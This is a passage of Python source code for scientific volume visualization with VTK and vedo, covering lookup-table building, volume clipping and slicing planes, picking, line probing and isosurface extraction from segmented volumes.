This class might look slightly convoluted but it's actually simple.
We use double mapping here in order to enable live/interactive visualization
of volumetric data. Instead of replacing values in a 3D volume, we only replace
the colors in the 1D LUT list.
    The point is that it's too slow to update the volume data itself, like a segmented
volume with custom values. Instead, we map such custom values to a 1D
array (our LUT) that maps colors to raw volume values.
This is much faster in terms of rendering and it enables interactive visualization.
The scalar_lut is the original LUT for the given scalars (custom values)
and the mapped_lut is the LUT assigned to the surfaces (like slices)
that have copied data from the volume. The volume is given color_map
and alpha_map through vedo methods.
You might say "ok for double mapping, it's the only way for interactive
rendering of a volume, but what about color_map and mapped_lut? Aren't
they the same?". The answer is: they're the same but VTK does not accept
a vtkLookupTable for a volume. Instead, it wants a vtkColorTransferFunction
and a vtkPiecewiseFunction for alpha. There's no way around it.
The color_map will be computed as a vtkColorTransferFunction and
the alpha_map as the vtkPiecewiseFunction.
"""
name: str = NotImplementedError
color_map_function: Any = None
scalar_map: np.ndarray = None
scalar_min: float = 0.0
scalar_max: float = 1.0
scalar_lut: vtk.vtkLookupTable = None
mapped_lut: vtk.vtkLookupTable = None
color_map: np.ndarray = None
alpha_map: np.ndarray = None
base_color_map: np.ndarray = None
def build(self, scalar_map=None, scalar_range=None, color_map=None,
alpha_map=None, zero_is_transparent=True,
noise_amount=0.0, nan_rgba=None):
"""
Build several look-up tables (LUT, sometimes known as transfer function) for the volume.
This is where double-mapping occurs for segmented volumes that have values from 0 to n where
each value defines a sub-volume or region. If we want to assign values (say from another model)
to these regions, we'd have to change the volume values and it would be too slow iterating over
each voxel in 3D. Instead we define colors that represent these values and assign them to
segmented regions in a 1D list.
:param scalar_map: A 2D list with values in first column from the volume itself and values from
the second column being your scalar values that correspond to such region
:param scalar_range: Min and max values in a list
:param color_map: Color map name to apply
:param alpha_map: Alpha map, either None or a list of values the same length as scalar_map, that
says how transparent a scalar value should be
:param zero_is_transparent: Whether zero values are made transparent, True by default
:param noise_amount: Whether a noise value is applied on the colors
:param nan_rgba: Color and alpha values to assign to invalid (out of range or None) scalar values
:return: LUTModel
"""
if color_map is None:
return
if nan_rgba is None:
nan_rgba = [0.0, 0.0, 0.0, 0.0]
if self.base_color_map is None:
self.base_color_map = color_map
colors = []
alphas = []
lut = vtk.vtkLookupTable()
scalar_lut = vtk.vtkLookupTable()
# Use the number of values in the volume
num_steps = len(self.base_color_map) if self.base_color_map is not None else len(color_map)
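# NOTE: the count computed above is immediately overridden by a hard-coded step count below.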
num_steps = 2655
s_min = 0
s_max = num_steps
if scalar_map is None:
if color_map is None and self.base_color_map is not None:
color_map = self.base_color_map
loop = range(num_steps)
noise = None
if isinstance(noise_amount, float) and noise_amount > 0:
noise = np.random.rand(num_steps) * noise_amount - noise_amount / 2
# Vedo works with nested lists:
# [region_id, [r, g, b]] for color, and [region_id, a] for alpha
if scalar_map is None:
# Standard volume that is not segmented
lut.SetRange(s_min, s_max)
lut.SetNumberOfTableValues(num_steps)
scalar_lut.SetRange(s_min, s_max)
scalar_lut.SetNumberOfTableValues(num_steps)
for r_id in loop:
color = vedo.colors.getColor(color_map[r_id])
color = np.array(color)
if noise is not None:
color = color + noise[r_id]
color = np.maximum(color, 0.0)
color = np.minimum(color, 1.0)
colors.append([r_id, color])
alpha = 1.0 if alpha_map is None else alpha_map[r_id]
if r_id == 0 and zero_is_transparent:
alpha = 0.0
alphas.append([r_id, alpha])
lut.SetTableValue(r_id, *color, alpha)
scalar_lut.SetTableValue(r_id, *color, alpha)
#scalar_map[r_id] = color_map[r_id]
else:
# Segmented volume
s_min, s_max = scalar_range
lut.SetRange(0, num_steps)
lut.SetNumberOfTableValues(num_steps)
color = None
for r_id in range(num_steps):
try:
value = scalar_map[r_id]
except Exception:
value = None
if value is None:# or s_min > value or s_max < value:
color = nan_rgba[:3]
alpha = nan_rgba[3]
else:
color = vedo.colorMap(value, color_map, s_min, s_max)
alpha = 1.0 if alpha_map is None else alpha_map[r_id]
if value == 0 and zero_is_transparent:
alpha = 0.0
colors.append([r_id, color])
alphas.append([r_id, alpha])
lut.SetTableValue(r_id, *color, alpha)
# Real scalar LUT, mainly as a reference for the user
# Here the colors resulting from the given scalar min to max
# are assigned to segmented values in the volume
mock_values = np.linspace(s_min, s_max, num_steps)
scalar_lut.SetRange(s_min, s_max)
scalar_lut.SetNumberOfTableValues(len(mock_values))
for r_id in range(len(mock_values)):
color = list(vedo.colorMap(mock_values[r_id], color_map, s_min, s_max))
alpha = 0.0 if mock_values[r_id] == 0 and zero_is_transparent else 1.0
scalar_lut.SetTableValue(r_id, *color, 1.0)
lut.Build()
scalar_lut.Build()
# Just to avoid confusion: the user can give a string as a color map, like 'viridis'
# but the real color map object is stored in self.color_map. The name 'viridis'
# is stored under self.color_map_function (if needed later on)
self.color_map_function = color_map
self.color_map = colors
self.alpha_map = alphas
self.scalar_map = scalar_map
self.mapped_lut = lut
self.scalar_lut = scalar_lut
def get_sorted_scalars(self):
"""
Get a numpy 2D array of key-value pairs sorted by value
:return: 2D array
"""
sorted_scalars = np.zeros((len(self.scalar_map), 2))
values = list(self.scalar_map.values())
keys = list(self.scalar_map.keys())
sorted_scalars[:, 0] = keys
sorted_scalars[:, 1] = values
sorted_mask = sorted_scalars[:, 1].argsort()
sorted_scalars = sorted_scalars[sorted_mask]
return sorted_scalars
class VolumeController():
"""
Wrapper class that handles both the volume and its slices
"""
def __init__(self, plot, model, initialize=True, clipping=True, slicer_box=True,
center_on_edges=False, alpha_unit_upper_offset=0.0, add_to_scene=True):
"""
Constructor
:param plot: Plot instance
:param model: VolumeModel instance
:param initialize: Whether initialization is performed right away
:param clipping: Whether clipping is enabled at init time
:param slicer_box: Whether the slicer box is enabled at init
:param center_on_edges: Whether the volume is offset by half a voxel or not
:param alpha_unit_upper_offset: The offset to apply to alpha unit computation.
If greater than 0, the volume will be less opaque
:param add_to_scene: Whether the volume is added to scene after init
"""
self.plot = plot
self.model = model
self.actor = None
self.picker = None
self.scalars = None
self.mask = None
self.bounding_mesh = None
self.alpha_unit_upper_offset = alpha_unit_upper_offset
self.alpha_factor = 0.001 # * self.model.resolution
self.clipping_planes = None
self.enable_volume_clipping = True
self.clipping_axes = []
self.slicers = OrderedDict()
self.slicers_selectable = False
self.scalar_bar = None
if initialize:
self.initialize(clipping, slicer_box, center_on_edges, add_to_scene)
#msg = 'Volume abs center', self.volume_center, 'position', np.array(self.volume_actor.pos())
#logging.info(msg)
def get_related_actors(self):
"""
Get all 3D actors related to this view (for registering it in the application)
:return: List of VTK objects
"""
actors = []
for slicer_id in self.slicers:
actor = self.slicers[slicer_id].actor
if actor is not None:
actors.append(actor)
for iso_id in self.model.isosurfaces:
actors.append(self.model.isosurfaces[iso_id])
actors.append(self.actor)
return actors
def initialize(self, clipping=True, slicer_box=True, center_on_edges=False, add_to_scene=True):
"""
Set the volume actor for visualization in VTK
:param clipping: Whether clipping is enabled
:param slicer_box: Whether the slicer box mode is enabled (6 clipping planes)
:param center_on_edges: Whether the volume's center is aligned to its edges
rather than the voxel center
:param add_to_scene: Whether the object is added to the scene
"""
self.build_actor(center_on_edges, add_to_scene)
self.initialize_picker()
if slicer_box:
self.initialize_slicer_box()
self.initialize_clipping_planes()
self.set_volume_clipping(clipping)
self.set_color_map()
'''
if use_mask:
self.mask = self.actor.clone()
self.mask.threshold(1, replace=1, replaceOut=0)
self.actor.mapper().SetMaskTypeToBinary()
self.actor.mapper().SetMaskInput(self.mask)
'''
def set_volume_visibility(self, on=True):
"""
Set volume visibility
:param on: Visibility boolean
"""
if self.actor is not None:
self.actor.SetVisibility(on)
def set_slices_visibility(self, on=True):
"""
Set the visibility of slices
:param on: Visibility boolean
"""
for slicer_id in self.slicers:
slicer_view = self.slicers.get(slicer_id)
slicer_view.actor.SetVisibility(on)
def get_slices_opacity(self):
"""
Get the opacity of slices (should be the same value for all slices)
A mean is computed over all slices' alpha values, just in case they differ
:return: Alpha value
"""
value = 0
num_values = 0
for slicer_id in self.slicers:
slicer = self.slicers[slicer_id]
if slicer.actor is not None:
slice_alpha = slicer.actor.GetProperty().GetOpacity()
if slice_alpha is None:
continue
value += slice_alpha
num_values += 1
if num_values == 0 or value == 0:
return None
return value / num_values
def set_slices_opacity(self, value):
"""
Set the opacity of slices
:param value: Alpha value
"""
for slicer_id in self.slicers:
slicer = self.slicers[slicer_id]
if slicer.actor is not None:
slicer.actor.alpha(value)
def get_opacity(self):
"""
Get the relative opacity unit
:return: Float
"""
return self.get_relative_opacity_unit()
def get_relative_opacity_unit(self):
"""
Get the alpha unit relative value
:return: Float
"""
alpha_unit = self.actor.alphaUnit()
r = self.model.resolution
# Inverse function of set_opacity_unit()
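# Note: the 1.1 constant below implies an alpha_unit_upper_offset of 0.1; with the
# default offset of 0.0 the round trip with set_opacity_unit() is off by 0.1.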
value = 1.1 - (alpha_unit / r)**0.5
return value
def set_opacity(self, value):
"""
Set the opacity of the volume like in set_opacity_unit()
:param value: Opacity value between 0.0 and 1.0
:return: Resulting alpha unit
"""
self.set_opacity_unit(value)
def set_opacity_unit(self, value):
"""
Set the opacity of the volume by modifying its alpha unit (a VTK thing).
The alpha unit defines how transparent a voxel is to an incoming ray.
This method normalizes the range between 0.0 and 1.0 as it depends
on the resolution of the volume
:param value: Opacity value between 0.0 and 1.0
:return: Resulting alpha unit
"""
r = self.model.resolution
# 1 is chosen and not 1.0 because when value == 1.0, that would
# mean that the volume is fully opaque and this yields artifacts with VTK
alpha_unit = (1 + self.alpha_unit_upper_offset - value)**2 * r
# vedo calls it "alpha" unit, vtk "opacity" unit. same-same!
self.actor.alphaUnit(alpha_unit)
return alpha_unit
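# Worked example (assuming a hypothetical resolution r = 25 and the default offset of 0.0):
#   set_opacity_unit(0.9) -> alpha_unit = (1 + 0.0 - 0.9)**2 * 25 = 0.25  (nearly opaque)
#   set_opacity_unit(0.1) -> alpha_unit = (1 + 0.0 - 0.1)**2 * 25 = 20.25 (mostly transparent)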
def get_spacing(self):
"""
Get the spacing/resolution of the volume
"""
res = self.model.resolution
spacing = None
if isinstance(res, int) or isinstance(res, float):
spacing = np.array([res]*3)
elif len(res) == 3:
spacing = res
else:
raise ValueError(f'Given volume resolution {self.model.resolution} is invalid')
return spacing
def build_actor(self, center_on_edges=False, add_to_scene=True): #[1, 2]
"""
Set the volume actor for visualization in VTK
:param center_on_edges: Whether alignment by one voxel is applied
:param add_to_scene: Whether the object is added to the scene
"""
spacing = self.get_spacing()
self.actor = Volume(self.model.data, spacing=spacing, mapper='smart')
self.scalars = self.actor._data.GetPointData().GetScalars()
self.actor.name = self.model.name
self.actor.shade(False)
self.actor.mode(0)
self.actor.pickable(True)
self.set_interactive_subsampling(False)
if center_on_edges:
# Moving the volume by one voxel. This is possibly due to the use of custom spacing.
self.actor.pos(self.actor.pos() + spacing)
center = np.array(self.actor.pos()) + self.actor.center()
if np.linalg.norm(center - self.model.center) > 0:
#print('Adjusting volume center from', self.model.center, 'to', center)
self.model.center = center
self.set_opacity_unit(0.9)
self.actor.jittering(True)
#self.actor._mapper.AutoAdjustSampleDistancesOn()
#self.actor._mapper.SetBlendModeToAverageIntensity()
#self.actor._mapper.SetSampleDistance(100)
if add_to_scene:
self.plot.add(self.actor, render=False)
def set_position(self, position):
"""
Set the position of the volume
"""
self.actor.pos(position)
# TODO: we're entering in unstable things when we move the volume
# because there is not yet a guaranteed support for updating the slices
# with the correct position
self.reset_clipping_planes()
def mirror_volume(self, axes):
"""
Mirror the volume on given axes
:param axes: A list of axes (either 0, 1, 2 or 'x', 'y', 'z') on which
the volume will be mirrored. Optional
"""
if axes is None or self.actor is None:
return
axes_str = ['x', 'y', 'z']
for axis in axes:
if isinstance(axis, int) and 0 <= axis <= 2:
axis = axes_str[axis]
if isinstance(axis, str) and len(axis) == 1:
self.actor.mirror(axis=axis.lower())
def initialize_picker(self, opacity_iso_value=0.0001):
"""
Initialize the volume picker
:param opacity_iso_value: Threshold that defines at what accumulated
opacity the picker hits the volume. In the case of a segmented volume,
you want to keep this value very low, like the default one.
"""
# As per C++ doc https://vtk.org/Wiki/VTK/Examples/Cxx/VTKConcepts/Scalars
# https://stackoverflow.com/questions/35378796/vtk-value-at-x-y-z-point
picker = vtk.vtkVolumePicker()
picker.PickCroppingPlanesOn()
picker.UseVolumeGradientOpacityOff()
picker.SetTolerance(opacity_iso_value)
# A low OpacityIsoValue is necessary in the case of segmented volumes
picker.SetVolumeOpacityIsovalue(opacity_iso_value)
picker.AddPickList(self.actor)
picker.PickFromListOn()
self.picker = picker
def initialize_slicer_box(self):
"""
Initialize 6 slicing planes as a box.
"""
for axis_id in range(6):
slicer_model = SlicerModel(axis=axis_id)
slicer_model.align_to_axis(axis_id, self.model.dimensions)
self.model.slicers.store(slicer_model)
# It's important in this case to have standalone=False
self.slicers[axis_id] = SlicerView(self.plot, self, slicer_model, standalone=False)
def update_slicer(self, slicer_id, value=None, normal=None):
"""
Update a given slicer with the given value
:param slicer_id: SlicerView id
:param value: Value or 3D point
:param normal: Normal
"""
slicer_view = self.slicers.get(slicer_id)
if slicer_view is None:
return
# This is an important part where the slicing plane is itself sliced by other planes
slicer_model = slicer_view.model
slicer_model.clipping_planes = self.get_clipping_planes(slicer_model.axis)
# Use given value (or point) and normal to guide the below code
result = slicer_model.update(value, normal)
if not result:
return
# Update slicing image
slicer_view.update()
def initialize_clipping_planes(self):
"""
Initialize X, Y and Z clipping planes with two planes per axis
for positive and negative slicing
"""
self.clipping_planes = vtk.vtkPlaneCollection()
slicer_models = self.model.slicers
for slicer_id in slicer_models:
self.clipping_planes.AddItem(vtk.vtkPlane())
self.reset_clipping_planes()
return
def get_clipping_planes(self, except_axis=None):
"""
Get the current clipping planes except the ones on the given axis
:param except_axis: Axis id to ignore. If None, all clipping planes will be returned
:return: vtkPlaneCollection
"""
if not isinstance(except_axis, int):
return self.clipping_planes
exceptions = [except_axis * 2, except_axis * 2 + 1]
planes = vtk.vtkPlaneCollection()
for plane_id in range(self.clipping_planes.GetNumberOfItems()):
if plane_id in exceptions:
continue
plane = self.clipping_planes.GetItem(plane_id)
planes.AddItem(plane)
return planes
def reset_clipping_planes(self):
"""
Reset clipping planes
"""
slicer_models = self.model.slicers
for slicer_id in slicer_models:
slicer_model = slicer_models[slicer_id]
plane_id = slicer_model.get_box_plane_id()
plane = self.clipping_planes.GetItem(plane_id)
plane.SetOrigin(slicer_model.origin + self.actor.pos())
plane.SetNormal(slicer_model.normal)
def clip_on_axis(self, position=None, axis=None, normal=None):
"""
Apply clipping on a single axis
:param position: Position
:param axis: Clipping axis, defaults to 0 (X axis)
:param normal: Plane normal; a negative component on the given axis selects that axis' negative clipping plane
"""
axis_offset = 0
# This should already be sorted in the model but in case it isn't, we double check here
if normal is not None and normal[axis] < 0:
# This means that the given axis has two
# clipping planes and we take the negative one
axis_offset += 1
#position = self.model.dimensions - position
axis_storage_id = axis * 2 + axis_offset
plane = self.clipping_planes.GetItem(axis_storage_id)
plane.SetOrigin(position)
plane.SetNormal(normal)
def set_volume_clipping(self, on=None):
"""
Set volume clipping on or off.
:param on: Whether clipping is enabled or disabled. If None, then
the state is toggled.
"""
if on is None:
self.enable_volume_clipping = not self.enable_volume_clipping
else:
self.enable_volume_clipping = on
if self.enable_volume_clipping:
self.actor.mapper().SetClippingPlanes(self.clipping_planes)
else:
self.actor.mapper().SetClippingPlanes(None)
def clip_to_bounds(self, bounds):
"""
Clip the volume and move the slicing planes according to 6 boundary points
:param bounds: Six values in a list (xmin, xmax, ymin, ymax, zmin, zmax)
"""
planes = vtk.vtkPlanes()
planes.SetBounds(bounds)
# Normals are reversed with the above code
# so we fix that here with flip_normals=True
self.set_clipping_planes(planes, flip_normals=True)
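# Example (illustrative): clip to a box spanning x in [0, 100], y in [0, 200], z in [0, 50]
#   controller.clip_to_bounds([0, 100, 0, 200, 0, 50])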
def box_widget_update(self, widget=None, event=None):
"""
Clip the volume with the current box widget
:param widget: vtkBoxCutter
:param event: vtkEvent
"""
if widget is None:
return
planes = vtk.vtkPlanes()
widget.GetPlanes(planes)
self.set_clipping_planes(planes)
def set_clipping_planes(self, planes, flip_normals=False):
"""
Clip the volume and move the slicing planes according to the given planes
:param planes: vtkPlanes
"""
vtk_n = planes.GetNormals()
vtk_pts = planes.GetPoints()
num_pts = vtk_pts.GetNumberOfPoints()
for plane_id in range(num_pts):
normal = vtk_n.GetTuple(plane_id)
origin = vtk_pts.GetPoint(plane_id)
plane = self.clipping_planes.GetItem(plane_id)
current_origin = np.array(plane.GetOrigin())
# We don't need to check the normal because
# we prevent box cutter rotation in our case
if np.linalg.norm(current_origin - origin) < 0.1:
continue
plane.SetOrigin(origin)
if flip_normals:
normal = np.array(normal)*-1
plane.SetNormal(normal)
self.update_slicer(plane_id, origin, normal)
self.clipping_planes.Modified()
self.actor.GetMapper().Update()
def set_alpha_map(self, alpha_map, alpha_factor=None):
"""
Set alpha map to the volume view
:param alpha_map: 2D list of scalar values and alpha values
:param alpha_factor: Alpha factor
"""
if alpha_map is None:
if self.model.luts.current is None:
return
alpha_map = self.model.luts.current.alpha_map
if alpha_factor is None:
alpha_factor = self.alpha_factor
if len(np.array(alpha_map).shape) > 1:
volume_alpha_map = np.ones_like(alpha_map).astype(float)
volume_alpha_map[:] = alpha_map[:]
volume_alpha_map[:, 1] *= alpha_factor
self.actor.alpha(volume_alpha_map)
else:
self.actor.alpha(np.array(alpha_map) * alpha_factor)
def set_color_map(self, color_map=None, alpha_map=None):
"""
Set the color and alpha map to the view objects
:param color_map: Nested list of scalar values and rgb colors
like [[0, [0.0, 0.0, 0.0]], [8, [0.5, 0.8, 0.3]], ...]
:param alpha_map: 2D list of scalar values and alpha values
"""
lut = self.model.luts.current
if color_map is None and lut is not None:
color_map = lut.color_map
if alpha_map is None and lut is not None:
alpha_map = lut.alpha_map
if color_map is None:
return
self.actor.cmap(color_map)
self.set_alpha_map(alpha_map)
if lut is not None:
for surface in self.model.isosurfaces:
surface._mapper.SetLookupTable(lut.opaque_lut)
for slicer_id in self.slicers:
slicer = self.slicers[slicer_id]
slicer.apply_lut(lut.mapped_lut)
else:
for slicer_id in self.slicers:
slicer = self.slicers[slicer_id]
slicer.set_color_map(color_map, alpha_map)
def disable_shading(self):
"""
Disable volume shading
"""
volumeProperty = self.actor.GetProperty()
volumeProperty.ShadeOff()
self.actor.SetProperty(volumeProperty)
def enable_shading(self, ambient=0.6, diffuse=0.8, specular=0.9):
"""
Enable volume shading
TODO: See if this method is useful
"""
volumeProperty = self.actor.GetProperty()
volumeProperty.SetInterpolationTypeToLinear()
volumeProperty.ShadeOn()
volumeProperty.SetAmbient(ambient)
volumeProperty.SetDiffuse(diffuse)
volumeProperty.SetSpecular(specular)
volumeProperty.SetScalarOpacityUnitDistance(1)
self.actor.SetProperty(volumeProperty)
def toggle_slices_visibility(self):
"""
Toggle slices visibility
"""
self.model.slices_visible = not self.model.slices_visible
for slicer_id in self.slicers:
slicer = self.slicers[slicer_id]
self.update_slicer(slicer)
if slicer.actor is not None:
slicer.actor.SetVisibility(self.model.slices_visible)
def toggle_hollow(self):
"""
Toggle hollow mode for volume rendering. This is intended
to work only on segmented (annotated) volumes.
"""
volume_property = self.actor.GetProperty()
# Shout at VTK devs: it's twisted to name properties Disable and then have DisableOff...
disabled = bool(volume_property.GetDisableGradientOpacity())
if disabled:
volume_property.DisableGradientOpacityOff()
alpha_gradient = vtk.vtkPiecewiseFunction()
alpha_gradient.AddPoint(0, 0.0)
alpha_gradient.AddPoint(1, 0.75)
alpha_gradient.AddPoint(2, 1.0)
volume_property.SetGradientOpacity(alpha_gradient)
else:
volume_property.DisableGradientOpacityOn()
return not disabled
def get_value_from_xyz(self, position, normal_step=None, avoid_values=0, cast_to_int=True, none_as_zero=False):
"""
Get a scalar value from the volume with respect to XYZ coordinates and, optionally, a normal step,
that is the normal along which to probe multiplied by the distance you want to travel further into
the volume to pick a correct value. Often the "surface point" on a volume with non-uniform transparency
is at the boundary between transparent (let's say a 0 value is transparent) and more opaque parts.
So you need to go further into the "cloud" so to speak, in order to find the values you want.
:param position: 3D array
:param normal_step: A vector normal multiplied by the lookup distance, in case the raw position yields
bad or unwanted results
:param avoid_values: Try and find other values than this
:param cast_to_int: Whether the value should be cast to integer
:param none_as_zero: Whether None (invalid) values are returned as 0
:return: Scalar value
"""
if isinstance(avoid_values, int) or isinstance(avoid_values, float):
avoid_values = [avoid_values]
# TODO: see if this is faster? To be tested
# ijk_result = [0.0, 0.0, 0.0]
# volume_actor._data.TransformPhysicalPointToContinuousIndex(xyz, ijk_result)
# volume_actor._data.GetPoint(ijk_result)
pt_id = self.actor._data.FindPoint(*position)
valid_id = 0 < pt_id < self.scalars.GetNumberOfValues()
value = self.scalars.GetValue(pt_id) if valid_id else None
if not valid_id or (value in avoid_values):
if normal_step is not None:
position += normal_step
pt_id = self.actor._data.FindPoint(*position)
valid_id = 0 < pt_id < self.scalars.GetNumberOfValues()
value = self.scalars.GetValue(pt_id) if valid_id else None
if cast_to_int and value is not None:
value = int(value)
if value is None and none_as_zero:
value = 0
return value
def raycast(self, origin, screen_position):
"""
Shorthand for pick() method
"""
return self.pick(origin, screen_position)
def pick(self, origin, screen_position):
"""
Find the nearest intersection – even on a sliced volume – with the ray formed
by an origin and a screen-space position (given by VTK when you click on an actor)
:param origin: Origin of the vector
:param screen_position: 2D position on screen. This is given by vtk events like MouseRelease
:return: The nearest position and its related value queried in the volume image
"""
self.picker.Pick(*screen_position[:2], 0, self.plot.renderer)
position = np.array(self.picker.GetPickPosition())
ray = position - origin
distance = np.linalg.norm(ray)
normal = ray / distance
# Go half a voxel further to make sure we don't hit "void"
vol_position = position # + normal * self.model.resolution / 2
probe_position = position + normal * self.model.resolution * 10
closest_dist = distance
slice_position = None
# See if the line hits any of the slicers (that are image planes)
for slicer_id in self.slicers:
slicer = self.slicers[slicer_id]
if slicer.got_slice:
hits = slicer.actor.intersectWithLine(origin, probe_position)
if len(hits) != 1:
continue
new_dist = np.linalg.norm(position - hits[0])
if new_dist < closest_dist and new_dist < self.model.resolution * 2:
closest_dist = new_dist
slice_position = hits[0]
if slice_position is None:
position = vol_position
else:
position = slice_position
value = self.get_value_from_xyz(position, normal * self.model.resolution * 4)
return position, value
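# Usage sketch (illustrative): typically called from a click callback where VTK/vedo
# provides a 2D display position, e.g.
#   position, value = controller.pick(camera_origin, event.picked2d)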
def add_probe(self, origin, destination, resolution=40, radius=10, color_map=None,
screen_space=True, min_v=None, max_v=None, add_to_scene=True):
"""
Add a series of points along a line probe
:param origin: Probe origin
:param destination: Probe destination point
:param resolution: Number of (equidistant) points that will be probed along that line
:param radius: Radius of the points
:param color_map: Scalars color map
:param screen_space: Whether the points are screen space or spheres
:param min_v: Min scalar value
:param max_v: Max scalar value
:param add_to_scene: Whether the new probe is added to scene
:return: Points
"""
if color_map is None:
color_map = self.model.luts.current.color_map
positions, values = self.probe(origin, destination, resolution)
points_obj = obj.Points(positions, values=values, radius=radius, screen_space=screen_space,
color_map=color_map, min_v=min_v, max_v=max_v)
points_obj.origin = origin
points_obj.destination = destination
# Dynamic properties assignment
points_obj.target = self.actor
points_obj.target_controller = self
if add_to_scene:
self.plot.add(points_obj)
return points_obj
def update_probe(self, origin, destination, points_obj):
"""
Update a probe with given start and end points
:param origin: Start point
:param destination: End point
:param points_obj: Points object
"""
resolution = points_obj._polydata.GetPoints().GetNumberOfPoints()
positions, values = self.probe(origin, destination, resolution)
points_obj.update_data(positions, values)
def probe(self, origin, destination, resolution=40):
"""
Probe a volume with a line
:param origin: Origin of the line probe
:param destination: Destination of the line probe
:param resolution: Number of point samples along the probe
:return: Positions and values
"""
origin = np.array(origin)
destination = np.array(destination)
distance = np.linalg.norm(destination - origin)
ray = destination - origin
ray_norm = ray / distance
step = distance / resolution
positions = [origin + ray_norm * p_id * step for p_id in range(resolution)]
values = np.array([self.get_value_from_xyz(point, none_as_zero=True) for point in positions])
return positions, values
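# Usage sketch (illustrative): sample 50 equidistant points between two 3D points
#   positions, values = controller.probe([0, 0, 0], [100, 100, 100], resolution=50)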
def set_interactive_subsampling(self, on=False):
"""
Set volume subsampling on or off.
This is enabled by default in VTK and we disable it by default in IBLViewer
:param on: Whether volume subsampling in interactive mode is on or off
"""
#self.plot.window.SetDesiredUpdateRate(0)
#self.actor._mapper.SetInteractiveUpdateRate(0)
self.model.interactive_subsampling = on
self.actor._mapper.SetAutoAdjustSampleDistances(on)
if on:
self.actor._mapper.InteractiveAdjustSampleDistancesOn()
else:
self.actor._mapper.InteractiveAdjustSampleDistancesOff()
def isosurface(self, label, exceptions=[0], force_rebuild=False, set_current=True, to_int=True, split_meshes=True):
"""
Creates a surface mesh (isosurface) of a segmented/labelled volume for the given value.
Unlike general isosurfacing, this method extracts only the surface mesh of the
desired region/label/segmentation, not of all values from 0 to label.
:param label: Label (scalar) value found in the volume
:param exceptions: If the label is found in the exceptions list, isosurfacing will not occur
:param force_rebuild: Whether rebuilding is forced in case we find an existing mesh for the given label
:param set_current: Whether the label is set as the current one in the model
:param to_int: Whether the label is cast to integer
:param split_meshes: Whether we split meshes when multiple ones are found
:return: A list of all manifold meshes for the given label
"""
if label is None or label in exceptions:
return
if to_int:
label = int(label)
existing_meshes = self.model.isosurfaces.get(label)
if existing_meshes is not None and not force_rebuild:
return existing_meshes
lut = self.model.luts.current
simple_lut = vtk.vtkLookupTable()
simple_lut.SetNumberOfColors(1)
simple_lut.SetTableRange(0, 1)
simple_lut.SetScaleToLinear()
simple_lut.SetTableValue(0, 0, 0, 0, 0)
simple_lut.SetTableValue(1, *lut.mapped_lut.GetTableValue(label))
simple_lut.Build()
# Generate object boundaries from labelled volume
discrete = vtk.vtkDiscreteMarchingCubes()
discrete.SetInputData(self.actor.imagedata())
discrete.GenerateValues(1, label, label)
smoothing_iterations = 15
pass_band = 0.001
feature_angle = 120.0
smoother = vtk.vtkWindowedSincPolyDataFilter()
smoother.SetInputConnection(discrete.GetOutputPort())
smoother.SetNumberOfIterations(smoothing_iterations)
smoother.BoundarySmoothingOff()
smoother.FeatureEdgeSmoothingOff()
smoother.SetFeatureAngle(feature_angle)
smoother.SetPassBand(pass_band)
smoother.NonManifoldSmoothingOn()
smoother.NormalizeCoordinatesOn()
smoother.Update()
self.model.isosurfaces[label] = []
#splitter = vtk.vtkExtractPolyDataGeometry()
if split_meshes:
splitter = vtk.vtkPolyDataConnectivityFilter()
splitter.SetInputConnection(smoother.GetOutputPort())
splitter.SetExtractionModeToAllRegions()
splitter.ColorRegionsOn()
splitter.Update()
for region_id in range(splitter.GetNumberOfExtractedRegions()):
#splitter.AddSpecifiedRegion(region_id)
#splitter.Update()
#poly = vtk.vtkPolyData()
#poly.ShallowCopy(splitter.GetOutput())
threshold = vtk.vtkThreshold()
threshold.SetInputConnection(splitter.GetOutputPort())
threshold.ThresholdBetween(region_id, region_id)
threshold.Update()
actor = vedo.Mesh(threshold.GetOutput())
#actor._mapper.SetScalarRange(min_value, lut.scalar_max)
#actor._mapper.SetUseLookupTableScalarRange(True)
actor._mapper.SetLookupTable(simple_lut)
actor._mapper.ScalarVisibilityOn()
actor.name = 'Isosurface_' + str(label)
self.model.isosurfaces[label].append(actor)
#actor.cmap(lut.scalar_lut, np.ones(poly.GetNumberOfVerts())*label)
else:
poly = smoother.GetOutput()
actor = vedo.Mesh(poly)
actor._mapper.SetLookupTable(simple_lut)
actor._mapper.ScalarVisibilityOn()
actor.name = 'Isosurface_' + str(label)
self.model.isosurfaces[label].append(actor)
'''
pdnorm = vtk.vtkPolyDataNormals()
pdnorm.SetInputData(smoother.GetOutput())
pdnorm.ComputePointNormalsOn()
pdnorm.ComputeCellNormalsOn()
pdnorm.FlipNormalsOff()
pdnorm.ConsistencyOn()
pdnorm.Update()
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputConnection(smoother.GetOutputPort())
mapper.SetLookupTable(lut.scalar_lut)
mapper.SetScalarRange(min_value, lut.scalar_max)
'''
if set_current:
self.model.isosurfaces.set_current(label)
return self.model.isosurfaces[label]
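# Usage sketch (illustrative): extract the surface mesh(es) of a single region label
#   meshes = controller.isosurface(315)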
@dataclass
class SlicerModel:
PREFIX = '[Slicer]_'
MIN_SLAB_THICKNESS = 1.0 #um
__count = 0
def unique_name():
SlicerModel.__count += 1
return f'{SlicerModel.PREFIX}_{SlicerModel.__count}'
name: str = field(default_factory=unique_name)
# 0, 1 or 2. See the normal for axis orientation
axis: int = None
value: float = 0.0
bounds: np.ndarray = None
#thickness: float = 0.0
origin: np.ndarray = np.array([0.0, 0.0, 0.0])
normal: np.ndarray = np.array([1.0, 0.0, 0.0])
clipping_planes: vtk.vtkPlaneCollection = None
def get_box_plane_id(self):
"""
Get the plane id
:return: Int
"""
if self.axis is None:
return
offset = 0 if self.normal[self.axis] < 0 else 1
return self.axis * 2 + offset
def get_axis_aligned_info(self, vtk_axis):
"""
VTK stores box clipping planes in the order:
-X to +X: 0, 1
-Y to +Y: 2, 3
-Z to +Z: 4, 5
This method retrieves which XYZ axis (0, 1 or 2) a given VTK plane index
refers to, along with its orientation sign
:return: Int axis and float orientation
"""
orientation = -1.0 if vtk_axis % 2 == 0 else 1.0
axis = (vtk_axis - vtk_axis % 2) // 2
return axis, orientation
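# For reference, vtk_axis 0..5 maps to: 0 -> (0, -1.0), 1 -> (0, 1.0), 2 -> (1, -1.0),
# 3 -> (1, 1.0), 4 -> (2, -1.0), 5 -> (2, 1.0)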
def align_to_axis(self, axis, dimensions=None):
"""
Set the axis of the slicer
:param axis: See parameter vtk_axis in SlicerModel.get_axis_aligned_info()
:param dimensions: Dimensions of the volume
"""
if not isinstance(axis, int):
return
normal = np.zeros(3).astype(float)
xyz_axis, orientation = self.get_axis_aligned_info(axis)
normal[xyz_axis] = orientation
